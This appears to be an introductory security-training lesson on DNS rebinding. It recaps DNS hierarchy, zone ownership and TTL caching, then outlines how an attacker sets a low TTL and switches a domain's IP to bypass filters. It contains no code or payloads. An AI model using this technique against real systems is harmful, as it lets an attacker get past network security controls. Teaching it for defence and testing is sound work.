Introduction
DNS Rebinding is an advanced attack technique that can bypass faulty security measures. Before learning how to identify web applications vulnerable to DNS Rebinding and then exploit them, let us quickly recap the basics of DNS.
Recap: Domain Name System (DNS)
The Domain Name System (DNS) is a hierarchical system that resolves domain names to IP addresses (such as resolving academy.hackthebox.com to 104.18.21.126 (IPv4) or 2606:4700::6812:157e (IPv6)); its structure resembles a tree. Parts of this tree managed by the same nameserver are called DNS zones.
Domain Hierarchy:
[Root]
β
βββββββββΌββββββββ¬ββββββββ¬ββββββββ
net org com dev io
β
[inlanefreight.com] β Second-level domain
β
ββββββββββββΌβββββββββββ
dev www mail β Sub-domains
β
WS01.dev.inlanefreight.com β HostDomain names are resolved from right to left, i.e., starting with the top-level domain, moving to the second-level domain, and subsequently all existing sub-domains.
DNS Zone Ownership
For DNS Rebinding attacks, it is essential to understand that DNS zone owners typically administer their own DNS zones. In the above diagram, the zone owner administers the inlanefreight.com zone and all of its subdomains.
Therefore, the zone owner can freely configure the DNS settings for their zone, including:
Adding entries for new subdomains
Deleting entries for existing subdomains
Reconfiguring the IP address that a domain name resolves to
Example: The inlanefreight.com zone's owner can configure the domain www.inlanefreight.com to resolve to 1.2.3.4 in the morning and reconfigure it to resolve to 5.6.7.8 at night; one use case for this might be load-balancing via DNS.
Important: The zone owner can configure their domains to resolve to ANY IP address, regardless of whether it is associated with the zone owner or if the system corresponding to that IP address does not know the zone owner's DNS configuration.
DNS Caching and TTL
Another essential part of DNS is caching. Suppose we interact with the same service for an extended period; performing DNS requests before each service request would cause considerable overhead.
For instance, when interacting with academy.hackthebox.com, students send numerous HTTP requests to it; without DNS caching, the domain name must be looked up with DNS before each HTTP request.
Thus, DNS responses are cached for a specified time before a new DNS lookup is required. This amount of time is called time-to-live (TTL), and it determines how many seconds the resolved IP address is valid before the domain name must be resolved again with a DNS request.
Example DNS Lookup
The TTL is specified in the ANSWER SECTION after the resolved domain name. In this case, the TTL is 300 seconds (equivalent to 5 minutes).
DNS Rebinding Attack Concept
As we will learn in the upcoming sections, attackers abuse the offensive DNS Rebinding technique (combined with a low TTL) to reconfigure a DNS server to point to a different IP address to bypass faulty filters or other security measures.
In a DNS rebinding attack, an attacker:
Configures a low TTL on their domain
Changes the IP address the domain resolves to between subsequent requests
We will explore this in more detail in the following sections.
Last updated